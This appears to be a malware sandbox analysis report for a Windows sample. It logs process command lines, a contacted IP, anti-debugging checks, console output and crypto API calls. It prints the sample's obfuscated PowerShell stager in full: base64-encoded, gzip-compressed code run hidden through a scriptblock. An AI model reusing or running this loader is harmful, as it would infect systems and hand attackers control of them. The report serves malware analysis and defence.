TAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
      2808
      - powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMH{1}4mYCA71XeY+jxhL/P1K+A4osGWs9NvjYnVlppQfY+IjBB9j4iBW1oQ1tGvBCM5jJy3d/hY85tLPRJlJeS9Y03VXVVb86Z5+GNiNRyGXpp+GS++Pnn7jrmqAYBRxfyo1{1}v8qV8L3cECov16V0+vvhE/eF4zfS8diJAkTC7efPShrHOGSX71oPMylJcLCjBCd8hfsvZ3k4xn'+'fj3QHbjPuDK/1e69Foh+iVLFeQ7WHuTgqd4m4U{1}ajQrmYcKWF8+bffypXNnbitdb+miCZ8{1}cgThoOaQ{1}m5wv1ZKR408yPmyxqx4yiJ9qxmkbDZqM3DBO'+'{1}xDtIe'+'sYaZFzlJGax5sSfGLI3Dq1mFnAsVX4btJI5syXFinCTlKrcpXthst//hN9fnZ{1}nISIBrg5DhODoaOH4kNk5qfRQ6FM/wfgtcBotJ6G4rFSB7jHzMl8KU0ir3d8TwOs5u4P0oE/+aCagmLK5Uwa/vGapFTkrxhbX8jq'+'bnYKjAeg4IwPDPAsb9LY6C{1}TtB9HJwW5vzDQad+UmUkDPrF06ocho8jlgU5/BZMuMUV7bPiHOlXHECq/qj4sQbL3C65pHC0WYREWf7IuBNDJS+RgXJ9+O5g/ckxJ08RAGxbyHLv+cVvKf4DEjtRqaDfnz5eoGdDqbYRayAuQiOb9i6AWHPvHJKqINjyQbPJqAVOL3yVpmL5/jyINRwAOhdviFaS3tIFHyjviZHfnu9+AaiskJRklS5SQqZalc5A'+'yOKnSonhQm5'+'Xkkpi87b8ou6WkoZsVHCbuK{1}lTdgXh9VojBhcWqDVwEA0zhimyBa4FHl+sTBcm4Q9/Z4+V00FEQpZA9IegRvwEmBgsGKWIlBz0tcVGoGZoPgSHEAROfCoVLkQpm4Jsk5upCLnfK7et4S4RL1BSw3PF5pCb4{1}aMSq3ILEDIpQAXERW/9MiW/rD{1}ijxPjqGv6WXhs5Z0UGlA5J10+KIL1idEYkZoCGGkeBjBL8sXWpNPwv9TGZSLBWg5Bqzt'+'An4iCDnw'+'a/OWkOIm1/P'+'{1}FCFGi{1}kkx66r1EMjez73XJdoYOfjC'+'AbrpoMWUi9ad'+'EkFue'+'LQtmsRddV3J0OH'+'NXnk{1}FSadfN1aJQLK+pdkd+SlrJBCqrVZ/KUjNZmvcFHzAbwV8PvAFJDuNYA8ldTySB4ksDGh3qMx{1}VkNdW7Rfb6ne3ooS4+OqU6/XHxzUa1NHkiOnQVO0mEVm3w7ken{1}hOcyci7o5/0C6hZ{1}m9fA'+'RWadk'+'ZdyLo4Pk/qo6x10we3SammvSqauZUqp1EncBcvTD9NOg7zZ0xXenSznb9RbLtTUcoeX0UTe15uigNQaKNzLUmW4qmbvr0XhtyP{1}1pce7HHgaXr5riH'+'T05LfgrVTv{1}OJYabU0QzZX1tqzA/9FTnfhr/P7tp63stGhm+lPA3jfl1DnaGG0r4sL3UQu{1}NEgSt+VpI96VpjzuFuum451aq477mkuLjSbqie7MVwsnyiZLxeTqa+v54DHrtHWUOAcVv4sm89PaCao1shq59Zi3XYa3dPsSc+1udq1G85q3fHEOZWPS0FtaD0{1}RUH7uGtKud0ZZsinQ109ooUgtkzLl+Y9b0nW9V79wRqeqB5J0jDyVNBTdMxFcIgXRusT3FnIPe7PfhDX0Wi6WmHwDcSKqPbIoAumoK6Z6bhTF+cPYgt7o8I45MuRJMOmBwaD9+'+'YNb3VUJxTkgZzxsC06kaTAvapbSP7VInhUF1dLydE+jOSs3ynktxeHzvK'+'DVy/WuOOnmukD3l1RV1onzVxJaV0RI7r+KqmTujj98uUXyKbNnISs{1}diW4qzoNz//VNo3'+'D68T6nv9VENx4iEKiQZ98lbv1C'+'hWr41vEpGCg+cvg5SP4xBTGDxgNLmVConSyC56L/RI6PqXXlyMBvPBWaf3dhXumbDy0pBvR58/r0FJKD'+'3nslAb4dBlXlU4NQUBWqlwElrnGvPjtinRMecv0qpFNz6j8yyfnuWDSLLneP7/gBgMXgw6wP'+'cw+x588LQP9Rr6x6WIFiDKUURfQ3i17Dke3iAI0Ilg/aaYuSBSQMAd/sqVWDGOvB5vSu549S/HzrUZePDH+evYeTn7i9sfiiehekHnm+O3B6+a6L+JgIUIA1IDehrFlzHrPSCu+fLKw+AcyIX9dRX/fYxTdqfDLHvuqv'+'8DWVRtAvsMAAA{0}')-f'=','2')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
        2924

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
89.197.154.116	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 30, 2024, 11:23 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 30, 2024, 11:23 a.m.			0	0
IsDebuggerPresent Sept. 30, 2024, 11:23 a.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 30, 2024, 11:23 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 30, 2024, 11:23 a.m.	buffer: C:\Windows\system32\cmd.exe console_handle: 0x00000007	1	1
WriteConsoleW Sept. 30, 2024, 11:23 a.m.	buffer: /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBIAHsAMQB9ADQAbQBZAEMAQQA3ADEAWABlAFkAKwBqAHgAaABMAC8AUAAxAEsAKwBBADQAbwBzAEcAVwBzADkATgB2AGoAWQBuAFYAbABwAHAAUQBmAFkAKwBJAGoAQgBCADkAagA0AGkAQgBXADEAbwBRADEAdABHAHYAQgBDAE0ANQBqAEoAeQAzAGQALwBoAFkAOAA1AHQATABQAFIASgBsAEoAZQBTADkAWQAwADMAVgBYAFYAVgBiADgANgBaADUAKwBHAE4AaQBOAFIAeQBHAFgAcABwACsARwBTACsAKwBQAG4AbgA3AGoAcgBtAHEAQQBZAEIAUgB4AGYAeQBvADEAewAxAH0AdgA4AHEAVgA4AEwAMwBjAEUAQwBvAHYAMQA2AFYAMAArAHYAdgBoAEUALwBlAEYANAB6AGYAUwA4AGQAaQBKAEEAawBUAEMANwBlAGYAUABTAGgAcgBIAE8ARwBTAFgANwAxAG8AUABNAHkAbABKAGMATABDAGoAQgBDAGQAOABoAGYAcwB2AFoAMwBrADQAeABuACcAJwArACcAJwBmAGoAMwBRAEgAYgBqAFAAdQBEAEsALwAxAGUANgA5AEYAbwBoACsAaQBWAEwARgBlAFEANwBXAEgAdQBUAGcAcQBkADQAbQA0AFUAewAxAH0AYQBqAFEAcgBtAFkAYwBLAFcARgA4ACsAYgBmAGYAeQBwAFgATgBuAGIAaQB0AGQAYgArAG0AaQBDAFoAOAB7ADEAfQBjAGcAVABoAG8ATwBhAFEAewAxAH0AbQA1AHcAdgAxAFoASwBSADQAMAA4AHkAUABtAHkAeABxAHgANAB5AGkASgA5AHEAeABtAGsAYgBEAFoAcQBNADMARABCAE8AJwAnACsAJwAnAHsAMQB9AHgARAB0AEkAZQAnACcAKwAnACcAcwBZAGEAWgBGAHoAbABKAEcAYQB4ADUAcwBTAGYARwBMAEkAMwBEAHEAMQBtAEYAbgBBAHMAVgBYADQAYgB0AEoASQA1AHMAeQBYAEYAaQBuAEMAVABsAEsAcgBjAHAAWAB0AGgAcwB0AC8ALwBoAE4AOQBmAG4AWgB7ADEAfQBuAEkAUwBJAEIAcgBnADUARABoAE8ARABvAGEATwBIADQAawBOAGsANQBxAGYAUgBRADYARgBNAC8AdwBmAGcAdABjAEIAbwB0AEoANgBHADQAcgBGAFMAQgA3AGoASAB6AE0AbAA4AEsAVQAwAGkAcgAzAGQAOABUAHcATwBzADUAdQA0AFAAMABvAEUALwArAGEAQwBhAGcAbQBMAEsANQBVAHcAYQAvAHYARwBhAHAARgBUAGsAcgB4AGgAYgBYADgAagBxACcAJwArACcAJwBiAG4AWQBLAGoAQQBlAGcANABJAHcAUABEAFAAQQBzAGIAOQBMAFkANgBDAHsAMQB9AFQAdABCADkASABKAHcAVwA1AHYAegBEAFEAYQBkACsAVQBtAFUAawBEAFAAcgBGADAANgBvAGMAaABvADgAagBsAGcAVQA1AC8AQgBaAE0AdQBNAFUAVgA3AGIAUABpAEgATwBsAFgASABFAEMAcQAvAHEAagA0AHMAUQBiAEwAMwBDADYANQBwAEgAQwAwAFcAWQBSAEUAVwBmADcASQB1AEIATgBEAEoAUwArAFIAZwBYAEoAOQArAE8ANQBnAC8AYwBrAHgASgAwADgAUgBBAEcAeABiAHkASABMAHYAKwBjAFYAdgBLAGYANABEAEUAagB0AFIAcQBhAEQAZgBuAHoANQBlAG8ARwBkAEQAcQBiAFkAUgBhAHkAQQB1AFEAaQBPAGIAOQBpADYAQQBXAEgAUAB2AEgASgBLAHEASQBOAGoAeQBRAGIAUABKAHEAQQBWAE8ATAAzAHkAVgBwAG0ATAA1AC8AagB5AEkATgBSAHcAQQBPAGgAZAB2AGkARgBhAFMAMwB0AEkARgBIAHkAagB2AGkAWgBIAGYAbgB1ADkAKwBBAGEAaQBzAGsASgBSAGsAbABTADUAUwBRAHEAWgBhAGwAYwA1AEEAJwAnACsAJwAnAHkATwBLAG4AUwBvAG4AaABRAG0ANQAnACcAKwAnACcAWABrAGsAcABpADgANwBiADgAbwB1ADYAVwBrAG8AWgBzAFYASABDAGIAdQBLAHsAMQB9AGwAVABkAGcAWABoADkAVgBvAGoAQgBoAGMAVwBxAEQAVgB3AEUAQQAwAHoAaABpAG0AeQBCAGEANABGAEgAbAArAHMAVABCAGMAbQA0AFEAOQAvAFoANAArAFYAMAAwAEYARQBRAHAAWgBBADkASQBlAGcAUgB2AHcARQBtAEIAZwBzAEcASwBXAEkAbABCAHoAMAB0AGMAVgBHAG8ARwBaAG8AUABnAFMASABFAEEAUgBPAGYAQwBvAFYATABrAFEAcABtADQASgBzAGsANQB1AHAAQwBMAG4AZgBLADcAZQB0ADQAUwA0AFIATAAxAEIAUwB3ADMAUABGADUAcABDAGIANAB7ADEAfQBhAE0AUwBxADMASQBMAEUARABJAHAAUQBBAFgARQBSAFcALwA5AE0AaQBXAC8AcgBEAHsAMQB9AGkAagB4AFAAagBxAEcAdgA2AFcAWABoAHMANQBaADAAVQBHAGwAQQA1AEoAMQAwACsASwBJAEwAMQBpAGQARQBZAGsAWgBvAEMARwBHAGsAZQBCAGoAQgBMADgAcwBYAFcAcABOAFAAdwB2ADkAVABHAFoAUwBMAEIAVwBnADUAQgBxAHoAdAAnACcAKwAnACcAQQBuADQAaQBDAEQAbgB3ACcAJwArACcAJwBhAC8ATwBXAGsATwBJAG0AMQAvAFAAJwAnACsAJwAnAHsAMQB9AEYAQwBGAEcAaQB7ADEAfQBrAGsAeAA2ADYAcgAxAEUATQBqAGUAegA3ADMAWABKAGQAbwBZAE8AZgBqAEMAJwAnACsAJwAnAEEAYgByAHAAbwBNAFcAVQBpADkAYQBkACcAJwArACcAJwBFAGsARgB1AGUAJwAnACsAJwAnAEwAUQB0AG0AcwBSAGQAZABWADMASgAwAE8ASAAnACcAKwAnACcATgBYAG4AawB7ADEAfQBGAFMAYQBkAGYATgAxAGEASgBRAEwASwArAHAAZABrAGQAKwBTAGwAcgBKAEIAQwBxAHIAVgBaAC8ASwBVAGoATgBaAG0AdgBjAEYASAB6AEEAYgB3AFYAOABQAHYAQQBGAEoARAB1AE4AWQBBADgAbABkAFQAeQBTAEIANABrAHMARABHAGgAMwBxAE0AeAB7ADEAfQBWAGsATgBkAFcANwBSAGYAYgA2AG4AZQAzAG8AbwBTADQAKwBPAHEAVQA2AC8AWABIAHgAegBVAGEAMQBOAEgAawBpAE8AbgBRAFYATwAwAG0ARQBWAG0AMwB3ADcAawBlAG4AewAxAH0AaABPAGMAeQBjAGkANwBvADUALwAwAEMANgBoAFoAewAxAH0AbQA5AGYAQQAnACcAKwAnACcAUgBXAGEAZABrACcAJwArACcAJwBaAGQAeQBMAG8ANABQAGsALwBxAG8ANgB4ADEAMAB3AGUAMwBTAGEAbQBtAHYAUwBxAGEAdQBaAFUAcQBwADEARQBuAGMAQgBjAHYAVABEADkATgBPAGcANwB6AFoAMAB4AFgAZQBuAFMAegBuAGIAOQBSAGIATAB0AFQAVQBjAG8AZQBYADAAVQBUAGUAMQA1AHUAaQBnAE4AUQBhAEsATgB6AEwAVQBtAFcANABxAG0AYgB2AHIAMABYAGgAdAB5AFAAewAxAH0AMQBwAGMAZQA3AEgASABnAGEAWAByADUAcgBpAEgAJwAnACsAJwAnAFQAMAA1AEwAZgBnAHIAVgBUAHYAewAxAH0ATwBKAFkAYQBiAFUAMABRAHoAWgBYADEAdABxAHoAQQAvADkARgBUAG4AZgBoAHIALwBQADcAdABwADYAMwBzAHQARwBoAG0AKwBsAFAAQQAzAGoAZgBsADEARABuAGEARwBHADAAcgA0AHMATAAzAFUAUQB1AHsAMQB9AE4ARQBnAFMAdAArAFYAcABJADkANgBWAHAAagB6AHUARgB1AHUAbQA0ADUAMQBhAHEANAA3ADcAbQBrAHUATABqAFMAYgBxAGkAZQA3AE0AVgB3AHMAbgB5AGkAWgBMAHgAZQBUAHEAYQArAHYANQA0AEQASAByAHQASABXAFUATwBBAGMAVgB2ADQAcwBtADgAOQBQAGEAQwBhAG8AMQBzAGgAcQA1ADkAWgBpADMAWABZAGEAMwBkAFAAcwBTAGMAKwAxAHUAZABxADEARwA4ADUAcQAzAGYASABFAE8AWgBXAFAAUwAwAEYAdABhAEQAMAB7ADEAfQBSAFUASAA3AHUARwB0AEsAdQBkADAAWgBaAHMAaQBuAFEAMQAwADkAbwBvAFUAZwB0AGsAegBMAGwAKwBZADkAYgAwAG4AVwA5AFYANwA5AHcAUgBxAGUAcQBCADUASgAwAGoARAB5AFYATgBCAFQAZABNAHgARgBjAEkAZwBYAFIAdQBzAFQAMwBGAG4ASQBQAGUANwBQAGYAaABEAFgAMABXAGkANgBXAG0ASAB3AEQAYwBTAEsAcQBQAGIASQBvAEEAdQBtAG8ASwA2AFoANgBiAGgAVABGACsAYwBQAFkAZwB0ADcAbwA4AEkANAA1AE0AdQBSAEoATQBPAG0AQgB3AGEARAA5ACsAJwAnACsAJwAnAFkATgBiADMAVgBVAEoAeABUAGsAZwBaAHoAeABzAEMAMAA2AGsAYQBUAEEAdgBhAHAAYgBTAFAANwBWAEkAbgBoAFUARgAxAGQATAB5AGQARQArAGoATwBTAHMAMwB5AG4AawB0AHgAZQBIAHoAdgBLACcAJwArACcAJwBEAFYAeQAvAFcAdQBPAE8AbgBtAHUAawBEADMAbAAxAFIAVgAxAG8AbgB6AFYAeABKAGEAVgAwAFIASQA3AHIAKwBLAHEAbQBUAHUAagBqADkAOAB1AFUAWAB5AEsAYgBOAG4ASQBTAHMAewAxAH0AZABpAFcANABxAHoAbwBOAHoALwAvAFYATgBvADMAJwAnACsAJwAnAEQANgA4AFQANgBuAHYAOQBWAEUATgB4ADQAaQBFAEsAaQBRAFoAOQA4AGwAYgB2ADEAQwAnACcAKwAnACcAaABXAHIANAAxAHYARQBwAEcAQwBnACsAYwB2AGcANQBTAFAANAB4AEIAVABHAEQAeABnAE4ATABtAFYAQwBvAG4AUwB5AEMANQA2AEwALwBSAEkANgBQAHEAWABYAGwAeQBNAEIAdgBQAEIAVwBhAGYAMwBkAGgAWAB1AG0AYgBEAHkAMABwAEIAdgBSADUAOAAvAHIAMABGAEoASwBEACcAJwArACcAJwAzAG4AcwBsAEEAYgA0AGQAQgBsAFgAbABVADQATgBRAFUAQgBXAHEAbAB3AEUAbAByAG4ARwB2AFAAagB0AGkAbgBSAE0AZQBjAHYAMABxAHAARgBOAHoANgBqADgAeQB5AGYAbgB1AFcARABTAEwATABuAGUAUAA3AC8AZwBCAGcATQBYAGcAdwA2AHcAUAAnACcAKwAnACcAYwB3ACsAeAA1ADgAOABMAFEAUAA5AFIAcgA2AHgANgBXAEkARgBpAEQASwBVAFUAUgBmAFEAMwBpADEANwBEAGsAZQAzAGkAQQBJADAASQBsAGcALwBhAGEAWQB1AFMAQgBTAFEATQBBAGQALwBzAHEAVgBXAEQARwBPAHYAQgA1AHYAUwB1ADUANAA5AFMALwBIAHoAcgBVAFoAZQBQAEQASAArAGUAdgBZAGUAVABuADcAaQA5AHMAZgBpAGkAZQBoAGUAawBIAG4AbQArAE8AMwBCADYAKwBhADYATAArAEoAZwBJAFUASQBBADEASQBEAGUAaAByAEYAbAB6AEgAcgBQAFMAQwB1ACsAZgBMAEsAdwArAEEAYwB5AEkAWAA5AGQAUgBYAC8AZgBZAHgAVABkAHEAZgBEAEwASAB2AHUAcQB2ACcAJwArACcAJwA4AEQAVwBWAFIAdABBAHYAcwBNAEEAQQBBAHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcAMgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA== console_handle: 0x00000007	1	1
WriteConsoleW Sept. 30, 2024, 11:23 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f14b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1078 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1a38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00392af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003931f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 30, 2024, 11:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003931f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
